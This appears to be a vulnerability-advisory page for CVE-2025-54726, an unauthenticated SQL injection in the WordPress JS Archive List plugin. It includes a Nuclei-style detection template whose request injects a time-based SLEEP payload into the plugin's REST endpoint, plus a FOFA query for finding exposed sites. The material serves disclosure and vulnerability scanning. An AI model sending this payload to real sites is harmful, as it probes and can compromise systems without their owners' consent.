CVE-2025-54726: WordPress JS Archive List <= 6.1.5 - SQL Injection

2026-02-24 WordPress JS Archive List PoC Public

Description

Miguel Useche JS Archive List contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.

PoC

id: CVE-2025-54726

info:
  name: WordPress JS Archive List <= 6.1.5 - SQL Injection
  author: Shivam Kamboj
  severity: high
  description: |
    Miguel Useche JS Archive List contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, modification, or deletion.
  remediation: |
    Update to the latest version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jquery-archive-list-widget/js-archive-list-615-unauthenticated-sql-injection
    - https://patchstack.com/database/wordpress/plugin/jquery-archive-list-widget/vulnerability/wordpress-js-archive-list-plugin-6-1-6-sql-injection-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54726
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-54726
    epss-score: 0.01514
    epss-percentile: 0.73216
    cwe-id: CWE-89
    cpe: cpe:2.3:a:flavor:js_archive_list:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="jquery-archive-list-widget"
  tags: cve,cve2025,wordpress,wp,wp-plugin,sqli,jquery-archive-list-widget,unauth,vkev

http:
  - raw:
      - |
        @timeout: 20s
        GET /wp-json/jalw/v1/archive?cats=if(now()=sysdate(),SLEEP(6),0)&exclusionType=exclude HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
          - 'contains_all(body, "years","expand")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 490a0046304402202f43d5c880525a03e501087a9c1c3c2157ad36937ed8455c4d4b89cdade04f3402205eeea7cbd05581ef880f2116fa4fb864565cc83cfec79f54a97d9564bbdc5873:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities